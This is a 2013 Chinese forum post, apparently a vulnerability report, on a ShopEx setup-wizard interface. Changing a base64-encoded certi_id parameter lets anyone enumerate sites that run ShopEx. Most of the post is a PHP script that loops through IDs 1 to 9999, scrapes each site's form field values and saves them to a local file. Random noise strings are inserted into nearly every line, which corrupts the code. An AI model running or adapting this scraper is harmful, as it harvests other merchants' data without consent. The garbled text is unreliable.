|
|
简要描述:
6 x# o& }- {( _9 W: A2 S& KShopEx某接口缺陷,可遍历所有网站5 V% X% e5 Q s' L0 O" A
详细说明:
D) T0 G4 T! b4 Z. P' x问题出现在shopex 网店使用向导页面 $ m( i, e) ^9 F5 k' v
% J- v$ x3 B) F2 G, h
' K5 \9 D5 L6 Y! z: X& y- l
9 ]+ N/ w+ T' l" i. ohttp://guide.ecos.shopex.cn/step ... WlkaWFuLmNvbVwvIn0=
4 |" ^, d0 J# b4 b" j/ |3 U3 i* `
3 b( y1 o8 H4 l1 ]9 @- U% P* q# a+ |# U! ?4 {) S8 _
: }; _2 n7 K: r( @; ]6 L: g! xrefer base64解密为 {"certi_id":'1051',"callback_url":"http:\/\/www.joyogame.net\/"}, B: [0 e% Q ~) @) S- o
5 L( x; T1 p: U- ?6 c* ]+ L" {
" Y3 ^7 W" S/ W |" n8 P2 e7 ~% |7 q0 [
我们修改certi_id 即可遍历所有使用了ShopEx程序的网站
; I" R# p* Q+ L" W$ O/ e# t/ Y9 S1 q. U" D, j+ o
( d) G% M0 G9 B( N0 |) J& l
! D0 o7 t0 }) p+ L. r( R, B<?php
0 M# |5 `: a0 B& G+ y" V
+ a" n6 \, f2 p8 @' H3 F. X4 U for ($i=1; $i < 10000; $i++) { //遍历
J- G" j8 J+ C& c
/ B; `. K: C9 {4 T, K' A2 B2 Q ShowshopExD($i);9 y* D% t0 I, h$ _9 k$ G! |
* q$ F' u1 [5 v' @- Y/ C: Z
}
, E% X; M. U; ? Q" O+ K7 G2 q0 I* ^1 J- S3 m" n8 c
function ShowshopExD($cid) {
/ Y! N* D. F& d( P
( l" D* k8 O' ~* ^9 q- I% Z $url='http://guide.ecos.shopex.cn/step2.php';
7 Q4 z: p. T4 n: l( b' N9 S' g3 _& ~7 Q7 h1 s8 B! n; {/ }
$refer = base64_encode('{"certi_id":'.intval($cid).',"callback_url":"http:\/\/www.a.com\/"}');* |3 W& }/ q8 V+ ]
2 w+ Y& o1 B# v7 o2 N $url = $url.'?refer='.$refer;' F: g- l" H& _$ ]
4 P3 { B$ g% v& u% ?( V6 Y2 d- K
$ch = curl_init($url);
* ]3 _8 L3 t- s8 I. P/ [
' ?. Z( v+ d+ q7 o. r1 t2 D, i curl_setopt($ch, CURLOPT_RETURNTRANSFER, true) ;
% G; r; m8 d7 J' p* O' D" ~2 q9 m4 @7 P. [: a
curl_setopt($ch, CURLOPT_BINARYTRANSFER, true) ;6 K7 I0 F, n4 s4 P0 M+ X% q) o
- v/ A, s- d" |6 x
$result = curl_exec($ch);
1 r: c2 ]1 ]- c v5 y, {" p1 Z2 \ e" P& z- }' H3 O' ?2 S( M( ~
$result = mb_convert_encoding($result, "gb2312", "UTF-8");
# v! X4 Y/ V+ t# \! o0 ^
; h0 W5 D& x( w- H6 }$ v if(strpos($result,$refer))
& z6 ~4 @/ q$ x; o. u' B9 j
& h9 ?0 W" j4 k* c {
; b/ y% j |; H+ y( g( [+ n2 @/ c1 ?) {$ ^5 s7 v
$fp = fopen("c:/shopEx.txt",'ab'); //保存文件
' z5 h N4 W- _0 G- L) G4 R. F
8 o) I# l3 T- U: j& F preg_match_all('/<input\stype="text"(.*?)\/>/',$result,$value);
5 z+ T/ P; z& s4 N, E, x' s; j4 | [) G8 w
foreach ($value[1] as $key) {
% M/ m6 l0 _; s
N% _5 P+ Y$ a8 P preg_match_all('/name="(.*?)"(.*?)value="(.*?)"/',trim($key),$res);: }) y# u6 i9 U
2 Q& U$ `0 \4 W echo $res[1][0].':'.$res[3][0]."\r\n";# @. B; Y4 L, n. P$ u! ^
2 o) B' F; N1 D7 ]! n F- k: M# G$ W1 E
$col =$res[1][0].':'.$res[3][0]."\r\n"; - J2 m2 B/ o, g1 T9 ]
$ e8 w8 Y3 A9 e* p+ U4 x! Y! }7 w fwrite($fp, $col, strlen($col)); + u# H! [) X/ O- w& O. D. B
0 k/ p n1 g2 K, o
}7 W9 I- U5 M* R: d% {; L
, q" A8 ]# ^; D0 C1 C& I
echo '--------------------------------'."\r\n";
6 r* ^9 c2 i/ |, R' d/ x( {5 z/ {5 e S+ O: C7 T/ A
fclose($fp);
/ J6 M( F9 R+ C3 T. U/ ~$ F. i* e" B: B Q3 i$ w; R
}
7 R7 H. K x" ^! F" {+ }& |" O7 U; a# C7 a, Q- y- \3 G/ Q0 E1 p1 _& u4 J
flush();9 }" } h- [: c6 c
; p* R8 C4 B# N- n. T3 i curl_close($ch);
' w/ y9 R6 r( y2 `% A2 G/ Z
- w; e' m' A3 X6 g4 s }
4 V! S9 c' J4 i& i! \2 V0 K$ q# M; y0 p: c/ `
?>- X8 V. b1 ~' c1 N
漏洞证明:
0 ?7 X' x2 p3 N. fhttp://www.myhack58.com/Article/UploadPic/2013-9/201392110502740490.jpg' M3 o, f# q2 I# C- P9 R
refer换成其他加密方式
& Y( z" [* o2 \! E3 { |
|
发表于 2013-9-21 15:59:47
收藏
支持
反对